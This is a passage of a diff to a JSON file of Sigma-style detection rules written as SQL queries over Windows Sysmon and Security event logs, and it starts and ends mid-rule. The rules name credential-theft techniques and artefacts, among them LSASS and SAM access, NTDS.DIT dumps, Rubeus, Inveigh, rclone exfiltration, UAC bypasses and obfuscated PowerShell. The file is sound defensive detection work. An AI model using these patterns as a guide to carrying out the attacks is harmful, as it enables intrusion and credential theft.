'\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation" - ], + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "status": "test", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "status": "test", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", - "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "status": "experimental", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ + "attack.discovery", + "attack.t1012", "attack.credential_access", - "attack.t1003.003" + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", - "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "status": "experimental", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "status": "experimental", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.defense_evasion", + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1078" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_crackmapexec_patterns.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "status": "test", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "SCCM" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + ], + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + }, + { + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR 